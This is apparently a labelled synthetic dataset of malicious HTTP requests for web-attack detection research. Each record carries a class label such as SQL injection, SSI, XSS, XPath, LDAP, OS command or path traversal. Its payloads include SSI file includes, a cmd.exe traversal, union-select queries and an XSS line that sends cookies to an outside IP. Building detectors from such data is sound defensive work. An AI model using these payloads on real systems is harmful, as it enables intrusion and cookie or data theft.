Proxy-Authorization: rertml hneO5=eocht
Authorization: edssen gudohr1a=luooomT
Range: 0516-7855,069180-,334-
Referer: http://www.rdsnieaa.de/5m4r6fno.sh
TE: chunked
Trailer: TE
User-Agent: Mozilla/7.0 (compatible; MSIE 8.1; WinNT; lgfosbiblp; keOy; FocteeSrh)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 2.4 www.ptbmt.png, 6.3 155.152.28.231, HTTP/2.4 www.Uuc2eat.htm
Transfer-Encoding: deflate
Upgrade: uTzmh/1.6, onhq/1.4, ecsat6/1.2, etDno/7.8
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

tr=qA)(   |   (7j=*)

End - Id: 37538
Start - Id: 40643
class: SSI
GET /yQj906Mgn3HBvY/PPIZ/yyqcUY0OTVplw/eChttpsA4SChVv/mlEtt/aneu7etltfooealll2s/wupdatediv1Nye/cvrSeZ/cdH6QW.tiff?zeIineoesk7Nf4h=aurfd&h5wan=o_4kCU_WCoX&snondwirllh=%3C%21--%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&sNhome8yK.HC=olsXkNRxq&eae3ro9g0t=89019&aq=3483069283&hlol=3189021&ynrp8snewaynpo=lXHzoq&htacces2ekcmdMo=openlI1t&krhYs4=9&7eBdd=pr8ushCdme6euNgr&NrraheR=sicn&rx1h6rhet=920334 HTTP/1.1
Host: www.clgcrnt.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 26.207.222.161
Cookie: tIoAEagu3du3=ou4q;ck4n=206098;QgKV5-odropZC=tMUZZ;emjhcdeah4neqim=Wo6hcrnee;ra=onlosrbgsoundbetweenD0h;z1Rdico8enrmr=sa5y88PrNwu
Cookie2: $Version="931"
Date: Fri, 17 Apr 09 13:01:09 CET
ETag: W/"hnHMbiq6MPPHHNzq2n"
Expect: ooeos=S6heu
From: temre6@tneo.biz
If-Modified-Since: Tue, 01 Jul 08 04:33:43 UTC
If-Unmodified-Since: Thu, 26 Feb 09 08:15:25 GMT
If-Match: "Ux7PiJTvBP_znqptT"
If-None-Match: "m-7fgxRSB.qeBczK9FB_"
If-Range: "0_vyhnPoV8LhtikmH"
Max-Forwards: 6894
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic cHRzZWFrOjBsaW1CdA==
Authorization: NTLM b0hoMGVlOGd0ZXRhZTc3b25uc0M0Z2V2b2dvT3BvZXRoVGU=
Range: -9579,186989-7
Referer: /e4eodase/eiaDTiie/hatu/saep/2mnt.nsf
TE: chunked
Trailer: Transfer-Encoding
User-Agent: or4d (sjcs2P; eFVab.; sLjDhxlY)
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 002x244
Via: FTP/7.1 164.60.33.169, 2.0 www.ee1h.png
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 799 245.96.63.176 "ln3reeOsrhu8a" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 258483037119432010
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40643
Start - Id: 46614
class: XSS
GET /sdYB6oC.css?KntYGnode=r_OJ&0gfyltmeReua=Arrfsls8rrycml&eSeXeszecos=hlom&se4oat0qeezsgee=o5VNfQ.sEy HTTP/1.1
Host: www.nteeachros.de:80
Connection: kvlmdsa
Accept: text/xml;q=0.7, audio/basic;q=0.2, application/*
Accept-Charset: macintosh;q=0.5, iso-8859-8;q=0.8, utf-8;q=0.1, windows-874, iso-8859-4;q=0.7
Accept-Encoding: compress;q=0.4, identity, compress
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 233.110.114.178
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="417"
Date: Tue, 18 Oct 05 10:08:45 GMT
ETag: "_ek5GFvMhnXVSDU6b"
Expect: 100-continue
From: gs5ol@srObw7XlrR.be
If-Modified-Since: Sat, 25 Jul 09 12:14:04 CET
If-Unmodified-Since: Mon, 09 Aug 04 16:04:15 UTC
If-Match: "jE2.vVfTYNi7gREoX"
If-None-Match: "grUO5_hx8oA562b"
If-Range: *
Max-Forwards: 97
MIME-Version: 3.6
Pragma: sadt=0wsoOt
Proxy-Authorization: 1cesn etzgcum=3f2cr
Authorization: 7rxig eeii=nrynliaz
Range: 7283-8
Referer: http://iefhss.uk/3oomd/5pmt2yn9/tchst.asp
TE: gzip,gzip;q=0.4,gzip;q=0.8
Trailer: Cache-Control
User-Agent: <object classid =  "     clsid:...     " codebase="    javascript: [window.open('http://108.164.201.192/tear.cfm'+document.cookie);]   "  >
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: FTP/1.5 9.64.72.114, 5.6 www.am7bmr.png
Transfer-Encoding: identity
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 045 www.g6oeJmh.shtml "HEkdlTofnTpdehenjd" 
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 43388399
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46614
Start - Id: 40572
class: SSI
GET /rOOU3izIc7ySetcN/airEmmraatsT/wQJQSe@G3/3TI/yScatES6bnPXW/soslcfmn/YfYrra/eGxX20msxB3PfE8_/ertlpxoycserseiwo/YCj@z.H.6where8/h99VywXJFOdp/4EX3EB.ulinkN4i.jpg?allsAYs=set&tehdt=kH6h2i&tsebi9=9&87gprb=44899292&Whunion@efUs=043&rieaenNsiyesu=%3C%21--++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&ahnAi=611&WriitIjL=bs3tNdsst%3Dt&jkt=iesshka%3A&k6tmbehusyas=mc HTTP/1.0
Host: www.Lu7ex.biz:3
Connection: iiocdtor
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: ic-E6Aerto, sktnqct-Npao6, hbnsBO-tl;q=0.9, 38ospb-E;q=0.0
Cache-Control: no-store
Client-ip: 172.74.200.100
Cookie: EmolgetmAllyyn=30;object7Syd0=leOsdd'y;sea6coaoEe=23732428;Hslr9vpur=19231
Cookie2: $Version="360"
Date: Sun, 16 Aug 09 17:51:07 GMT
ETag: "FnQikxnnlglOXVUA1"
Expect: nnoh3ur=unoiiuae
From: ciHn@mdreeh.gov
If-Modified-Since: Sat, 29 Dec 07 05:21:54 CET
If-Unmodified-Since: Mon, 16 Jan 06 20:37:30 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.9
Pragma: ueo='Teo'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Basic c1JTbmlyc2Q6bXRyMGZlbWw=
Range: -296381
Referer: /iamuii/rDai/nenyp.jsp
TE: deflate;q=0.9,trailers
Trailer: Host
User-Agent: ji6ihJnyy http://www.cceu.fr
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: WinNT
UA-Pixels: 0455x286
Via: FTP/6.4 193.1.211.237:356
Transfer-Encoding: identity
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
X-Serial-Number: 56779
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40572
Start - Id: 44261
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 1.32.7.73:08616
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 225.50.172.247
Cookie: iza=250635
Cookie2: $Version="544"
Date: Mon, 20 Feb 06 08:51:32 GMT
ETag: "HzqQFUqehcIoGlGbs_6"
Expect: ohder2=drntNg
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Thu, 15 May 08 03:37:44 UTC
If-Unmodified-Since: Sat, 24 Jan 09 23:48:29 UTC
If-Match: *
If-None-Match: *
If-Range: "lzLhUagNQisyk3rR7D0u"
Max-Forwards: 8
MIME-Version: 4.2
Pragma: at7b='e'
Proxy-Authorization: YOigog n4on=aery00e
Authorization: Ee5lv koctmu=lcpnt
Range: 9644-,6569-1848
Referer: http://eejl.it/ooTmeaxa/nitPtrt/eos2/geAd/yesi.cfm
TE: gzip
Trailer: Accept-Language
User-Agent: eD0Wzb http://www.m2hboeh.de
UA-CPU: 68000
UA-Disp: 9864,838,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7064x6561
Via: HTTP/1.3 55.46.17.190, 1.8 165.175.26.205, FTP/0.6 www.xeee.html:06065
Transfer-Encoding: identity
Upgrade: otLd/1.3
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44261
Start - Id: 48677
class: XPathInjection
POST /sAe--y7GW3u0yNuJ/dlceoe9y0mIadleo/inAEqGJ/coet/oK3ma.bLv6WalK/1rreftLndzuea.js? HTTP/1.1
Content-Length: 383
Content-Language: a2o
Content-Encoding: identity
Content-Location: /cadnlrN/teugar/7wcknbna/piqnak.htm
Content-MD5: MGl0aUxZaGFvZWFkYmhudA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Dec 09 07:54:57 UTC
Last-Modified: Sat, 02 Sep 06 13:24:33 GMT
Host: 135.88.37.37
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, iso-8859-8;q=0.8, iso-8859-2, gb2312, iso-8859-6
Accept-Encoding: *
Accept-Language: ienAZw-Zsh3;q=0.0, dybn9S-i;q=0.8, 9erlIh-Uimirh;q=0.7, e2feynis-n4pseen;q=0.5
Cache-Control: tenr3=iF
Client-ip: 108.91.253.160
Cookie: oAneOtxeiNilota=sa]jtshutdownh/s2;@jbJ=objecte;eoroEsea8=location;Rauleebitihbcia=w|;9ee2wetthwje=c4lnu:E
Cookie2: $Version="20"
Date: Thu, 22 Jul 04 22:28:59 UTC
ETag: "3.OeJwn1snCY3-uU"
Expect: 100-continue
From: NpAbn@exte7naon.de
If-Modified-Since: Sun, 26 Dec 04 08:16:46 GMT
If-Unmodified-Since: Thu, 01 Nov 07 09:42:44 CET
If-Match: "w65.tM-.nZn0euO1qe"
If-None-Match: *
If-Range: Wed, 29 Aug 07 13:48:10 UTC
Max-Forwards: 8010
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c2FyOWF0c2FBcjZTZ3lucGFlcG4yc2VlMmFtYWF3dWprdQ==
Authorization: Basic amg4c0VuczpodGgyaW5z
Range: 12-
Referer: /iNqteol/rmgatame/nntre/aodexN.pdf
TE: chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.8 (Windows; U; Win98 1.9; r0-te; rv:5.6.8) Gecko/76245505
UA-CPU: MIPS
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: HTTP/1.2 22.29.184.224, HTTP/2.0 44.128.131.106
Transfer-Encoding: identity
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 943 229.91.156.75 "nesehuesoC8tteHm" "Sat, 27 Dec 08 05:58:02 CET"
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wn1Tcao= yS&dbftarReEtixe=e&StformrtqoS9eandi&.ilUt4sc=ye&oqh4ei8msm=gnzyA'  or    path/child::node()[position()=N] or 'egXonmh'    =  '&kHmy6htaccesFMv_=inl@e&positionFbbgsoundibdiv@=goerHgmrelalho&hqE6asl=xK-5ypkJj4&oothluenlSeh=8414170&Oejsy=\tusrn+pesnikBbpHl~&f%&C8B@Y6Bt-=710224&caat=allt&Qo0feAgsb=lWV8nn&imtptoehary=idwinntbhidandm

End - Id: 48677
Start - Id: 37479
class: LdapInjection
GET /9HMperl/Abetlmcs2e0w/mtUoN5S0rdIH77Yo9.swf?E6oevanmCoFnd=lho9mt5Pl2coot5&MK@@nArGcwZX=attNtt6azsd&Zihbazcmd=%29tmp&tehtocradintn8=bzcAhete8lt97&yaetqTa=kjF&yhmhuhsOTsldqz=85&HKUdocumentkA=tdNBZsuU&ilr5ebmwr71R=3318150&tDpJ=Lrt&N6y-EC4=euletrtte&1O=a9v-qT&Dn34vEwTz5iframeK=%29aeeb&sOdinenbis0res=23&ijpiBOr7ahTohe=lue&MPcH=11618189 HTTP/1.0
Host: 196.74.147.173
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1254, euc-tw, windows-1253;q=0.6, cp-950;q=0.3, windows-1254
Accept-Encoding: *
Accept-Language: i-sntgsfb, t2u-nhgue, esa-tiym, dnvro-nr;q=0.0, tDuTncrV-dtn69sUu
Cache-Control: no-cache
Client-ip: 109.40.195.249
Cookie: ocsOfnxjccl=eichpyreea7t;zs8radlOspdtano=s2)(  |(tc=*);sune=6;t6ee6u;hufai7etndne=-;WIkerluv5n2i=95
Cookie2: $Version="465"
Date: Mon, 22 Sep 08 22:37:13 GMT
ETag: "k0NQUqdCVpoxxSEOVAzR"
Expect: tjza
From: gthTsg@tssp.com
If-Modified-Since: Mon, 07 Apr 08 24:34:38 GMT
If-Unmodified-Since: Sun, 07 May 06 14:57:32 GMT
If-Match: "BN@MM@gUcoTWkgN4inv0"
If-None-Match: *
If-Range: "tf9t1dtG2yJfbEYikZ"
Max-Forwards: 0
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic Nm1pUk9zaTp1ZXZjQXI=
Authorization: NTLM ZHNtaWVyZWduc3Q3aXV0bmkzYm1kZlN0ZWFFb3NyaW9o
Referer: http://www.zns0.org/esemluf/olmoob/haevoe/opuoteu.html
TE: chunked;q=0.7,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 2.6; uf-od; rv:0.4.2) Gecko/76134763
UA-Disp: 6467,4421,8
UA-OS: Windows 95
UA-Color: color32
Via: HTTP/0.3 194.114.90.93, 3.1 www.Mleikjh.shtml, 3.5 www.n7gNebew.css
Transfer-Encoding: gzip
Warning: 677 51.35.224.146 "edtba6i7Eepe" "Sun, 25 Jan 04 03:07:08 GMT"
X-Forwarded-For: 84.127.146.130
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37479
Start - Id: 35171
class: SqlInjection
GET /VgG887Dreplace./ezTLax9KTLS2wpxMW4PQ/Mvdrhrlerfswfer5/rhszenAcwF1osmna/tEovtM-DDW@H/dmDeZhdpoite5a4le/fF9xDjnll1.IGr/ynw0mFj/VHxUMKonR.S0xml/_4/0gpFCh00IQWymA7es_/eMkenixnteeu5eoer.nsf?dlosm4Uwksbph=08&F@T2catFvMh4O=+&rncetWho=Etud&ch2o2ewLa1bm=szZfvnLa0&5F.w5xpbody=or++0%3C%3E%28select++count%28*%29+from+rsia%29&k9JoeshrarH=43005425&ydei=1719304&uMasedi=Dwinntsiaer1Wejw&sot=i+tlibnobjectAo HTTP/1.1
Host: www.brIqeuii.com:5
Connection: close
Accept: text/*, application/x-tar;q=0.5, audio/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: tcrhenju-se, ITm-qAdnski;q=0.7, hN-o;q=0.4
Cache-Control: no-transform
Client-ip: 86.6.34.68
Cookie: bhatTchgtrryedM=ax4eqesr9Rw;Km6KoQJ=esLilyDect;eTkm72hrs=82118
Cookie2: $Version="07"
Date: Fri, 13 Feb 09 13:58:48 UTC
ETag: W/"Nd0RHovDptIfp4J8.R"
From: oter@6rerdeznR.uk
If-Modified-Since: Thu, 22 Jul 04 16:44:03 CET
If-Unmodified-Since: Wed, 08 Nov 06 09:36:44 UTC
If-Match: *
If-None-Match: "idJyU-TtkiuSmVzitD"
If-Range: *
Max-Forwards: 52
MIME-Version: 7.8
Proxy-Authorization: NTLM bWM1dG80b0x0MjBzYWFzaXVmZXRzczlyM211NG5yaHR2YjNtbW5zY25sZTlsNWZv
Authorization: cwoS iinen=7oexy
Range: -619874,-90
Referer: http://rtiag3.gov/4ratax/zntl5f/etftea9t/dLeilEhn/ie9lt.php
TE: chunked;q=0.2,trailers
User-Agent: hU3tnUo7 http://www.yttstl4r.st
UA-Disp: 1579,9873,8
Via: FTP/4.5 www.eaee9eNc.png, 1.4 101.62.77.40
Transfer-Encoding: ndteU
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35171
Start - Id: 35137
class: SqlInjection
PUT /eG--D8/1um/rraiool3enit44gsfjaI/irvi/iLaG_YMBqQ59fd6/areneaotoueuhe3eeo/hbct9elts0t6Nto/eEYTlNruuM.Vr.jpg? HTTP/1.1
Content-Length: 303
Content-Language: gyhE,ye
Content-Encoding: identity
Content-Location: http://www.eo1rad.cz/di7b4eg/cdcnzvew/0rayyo.mp3
Content-MD5: dWVyb29vb2VlaElzQXNkag==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Aug 08 22:27:38 CET
Last-Modified: Sun, 29 Apr 07 21:01:13 GMT
Host: 70.157.82.89:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: 
Accept-Language: h-nboa;q=0.4, dct-nroaae;q=0.9, hY-l1Ean;q=0.0, sde-8oe
Cache-Control: only-if-cached
Client-ip: 80.97.152.196
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="87"
Date: Fri, 02 Apr 04 10:05:52 UTC
ETag: W/"MaFaMljEGmVHfr4xyQJ"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Fri, 15 May 09 20:02:00 CET
If-Unmodified-Since: Mon, 12 Dec 05 09:48:43 UTC
If-Match: "36@whpe5_bc2ZOx"
If-None-Match: "4.WO_PshxG7KBKr"
If-Range: *
Max-Forwards: 239
MIME-Version: 5.3
Pragma: n1c9seu=tlnutttx
Proxy-Authorization: Digest username="e7tedn"
Authorization: Digest opaque="feure"
Range: 9644-,893-04607,798896-
Referer: /YbechW/ryonee/vgtirlei/rbes.png
TE: trailers,chunked;q=0.4
User-Agent: NN7rxua (z5Je5TrH8w)
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
Via: acu8le/2.9 133.99.177.164, FTP/2.7 238.80.185.199
Transfer-Encoding: gzip
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hn=ojih0veMo0us&Iennctkoyixecre=1?8nt2&BdlueNo=casxuy&8plgroup bywXTz9=5328980&1oshgcwtb9smj=o45G7a_TOT&E2rHpBiS='   union  select     sum(3c)    from u8sopayr--&fiEuseaaamiWc6x=z1tcC4taRcaVttarNo&wu2slgx=rWnop&goietrh=Brp&BDc0Ypq2=362203&winntA77xoEEgm8a=cg0so&ujyem=> oh&ge4wit9zsgnony=aaaem

End - Id: 35137
Start - Id: 42617
class: SqlInjection
GET /eerCt45yoeoSpstss/eAamdetevsrsiaeb9h/hntnesgteasaaceHs/Lhntin/eQ6nDHKYP/eTaq8Zqlg56i.pt8B/wbcalh/ttoitrrtNoCe/s1DWqtVSO4M.js?ZEAWo7=%27+++++OR++%273NrwvNRaorft2%27++++%3D++++%27++++ HTTP/1.1
Host: www.e8sdvtd.net:80
Connection: madt62
Accept: audio/basic;q=0.8, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 51.55.210.40
Cookie: 7ivlei=49;hctNtm=lFFgwh@;phpxdhD8=N0v3ao1cAldi5i0oe;vuARo2= ;nxolItq=530;iRp=Li\oh
Cookie2: $Version="942"
Date: Tue, 05 Apr 05 09:27:43 CET
ETag: W/"FXXTyG49LAn3eWm@Zb"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Fri, 01 Jun 07 03:18:48 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 06 Dec 06 14:06:12 CET
Max-Forwards: 45
MIME-Version: 0.0
Pragma: Utne='qoowHten'
Proxy-Authorization: Basic ZTZhMjpyOGRzeQ==
Authorization: Basic c3Nlc29mOm1ob3R5dGJw
Referer: http://www.rnIrtsa.it/e43boo/Xm9aSAo.php3
TE: chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 6.1; xl-ni; rv:0.2.0) Gecko/89194660
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Pixels: 4720x346
Via: HTTP/7.5 www.i4tgin.shtml:59, 5.8 230.89.99.224:8341, HTTP/3.1 222.23.88.52
Transfer-Encoding: oethN; Sk2exwoe=n1um
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42617
Start - Id: 39783
class: SSI
GET /tY5aQ4c8AblfNw/321mw7r/rt3anarrobOihaihhtt/d6yDYD5baoeniLGt/sLMcO/oPPUHJ8AwC_oSBu_i2q/pyum.css?eoq=eycves2dhtmejrcys&fqeRyiml=6&am=u+ptoi2&fmoreAichcordcd=54&Ufdivopt97WEk=07461801&tyiuehThkngtm=%3C%21--%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E&etmotlai4etoiH=25074&5alveem8fex9den=1eawe HTTP/1.0
Host: 166.77.214.103
Connection: keep-alive
Accept: image/gif, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: dtoouae-ednmanr3, ittwio-c8Sp6mye;q=0.0, ao01-lgjstnv;q=0.2, a-edik, pil-nEsu
Cache-Control: max-age=00499
Client-ip: 229.160.97.24
Cookie: bXFaXboot.inizC.a=ni3
Date: Wed, 24 Jun 09 08:30:18 UTC
ETag: W/"Ne7FULYkvbu.-BWNg_8"
If-Unmodified-Since: Mon, 24 Apr 06 24:50:20 UTC
If-Match: *
If-None-Match: "02z_Tt5wnpQ4NDNmjBID"
Max-Forwards: 6
MIME-Version: 6.0
Pragma: hdewe7='p'
Authorization: Basic M3p1czBmZTpjaW5lYXJkcw==
Range: 153-666
Referer: http://iloiblis.biz/Dgneabh/ehth5/tegeayr.aspx
Trailer: Via
User-Agent: Mozilla/3.3 (compatible; Konqueror/7.5; Open BSD i386; aeSigeeng; wuscrgt; itegewae)
UA-Pixels: 181x202
Upgrade: Krsn/5.1, q45i98/5.6, ssP5u/2.3, saswai/9.9
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39783
Start - Id: 45166
class: PathTransversal
GET /../../? HTTP/1.0
Host: www.eeddc.it:80
Connection: q4tHe
Accept: text/xml, image/*
Accept-Charset: hz-gb-2312;q=0.5, x-mac-cyrillic, x-mac-arabic;q=0.4, utf-8;q=0.9, x-mac-arabic
Accept-Encoding: identity;q=0.3
Accept-Language: ObeTesh-eoat, edtqdcE5-bhNisdno, o-ags;q=0.1
Cache-Control: no-cache
Client-ip: 3.86.215.159
Cookie: bsmSo=oansait;V5CTXjwmKNR=wLYfE_d
Cookie2: $Version="70"
Date: Sat, 20 Feb 10 19:56:31 GMT
ETag: W/"A2GfweKXm_TLmbvnWY"
Expect: p3fz=emrs
From: hdOf9re@eutwEh.uk
If-Modified-Since: Sun, 29 Jan 06 23:54:29 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 372
MIME-Version: 3.0
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: o25ra fbeoarR=nHIiirse
Range: 551-3881,-846
Referer: /tttri/Eis3ee/csgtn.wav
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/0.6 (compatible; Konqueror/5.2; Unix; ss0t0)
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: tlEn5; ceeeeer=geezwhe
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45166
Start - Id: 48666
class: XPathInjection
PUT /ermt/qn/sY2c2gWpLrT5S5N@/sWCoNFMYpbO4.pl? HTTP/1.1
Content-Length: 273
Content-Language: e
Content-Encoding: deflate
Content-Location: /r7VHedxp/iIumhr.asmx
Content-MD5: VW5ha1NhNmRuNW5Hc2xkaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Wed, 14 Dec 05 16:26:41 CET
Host: 134.129.201.2
Connection: cStqrc
Accept: text/html
Accept-Charset: x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 94.68.181.174
Cookie: safeenaii=85801;no4qt=032984;1ojoyp='8;0at4ae=]eelL>eMaac;snh5ou=tLCN3r8wM
Cookie2: $Version="97"
Date: Fri, 21 Mar 08 22:15:00 GMT
ETag: "cnauA-Zw-FFdJ3uxZP0"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Fri, 27 Feb 04 07:18:26 GMT
If-Match: *
If-None-Match: *
If-Range: "Dq@hqaIle13M7L2QGj@-"
Max-Forwards: 6
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM cXRpQWFnd2NlemgwdjBhZXNsaWRzc3NvZWV0MmVveW5sbg==
Authorization: ugdnw pugF=iytalt
Range: 12-
Referer: /lten/syQrnt/tsyr0tn/t6vfsu2/dstepwpe.swf
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.1 (X11; U; SunOS sun4u 2.9; Ze-xE; rv:2.9.5) Gecko/15820373
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 5.7 www.5cldeueu.shtml
Transfer-Encoding: 75ipd; dwidtOt=nElnan
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 105.28.18.229
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

ie9huiDe5iAuhwd=nNq5cls&.MPpsvpPservicesprocessing-instructionTdG=361&ZA1a=i<id\b$igrr&stys29ntcdTpv=fXi' or iiea/cres/child::node()[processing-instruction()=63]   or 'mvbofwW'=    '&QQfDn=@Auhpasswd&knkaoeooncdT=48448374&atsc=do--Qg

End - Id: 48666
Start - Id: 42383
class: SqlInjection
GET /tHgdU2DfC@L4s/eBaRt/7ailtKoerfeebp/latrzJU/grTwod.sOKsN/y0vaTNm20PWp9/n9uesn6lsa/h@5aXX6KL3nb/@rGHSG-YzGlogxallfM/sipeeerr2eihrci.png?oF4nsqLhsL=lsEe95ua&tn9zsutt=eXLtWKP-r&jHKti3t=u%40TO&dealbezr=iin2&imgbetweenGOt=deTouwsHiAhnl&Cf8cNng5positionhexecz=0132&iyte9t=enusr&pom=it6lx6I9agxn6f3&Democha51.CH=93161661&s0oiiswgh=15304251&troTm=sr%5D%25s+%5C%3F%3A&if=rgSCyvZi&rluefi4a=7599317&osaUe=select++rjtm+++++from++ALL_USERS HTTP/1.1
Host: 49.57.84.161
Connection: sjp2
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=765
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="17"
Date: Sat, 11 Jun 05 05:01:45 UTC
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: adsnMlj
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Sun, 18 Dec 05 03:49:48 GMT
If-Unmodified-Since: Tue, 17 Jun 08 16:05:21 CET
If-Match: "qG47FfE4aKck@72A"
If-None-Match: *
If-Range: "xTzakPSmG.D.Q2WIE"
Max-Forwards: 3914
MIME-Version: 9.3
Pragma: gnhveo='Di9m1X'
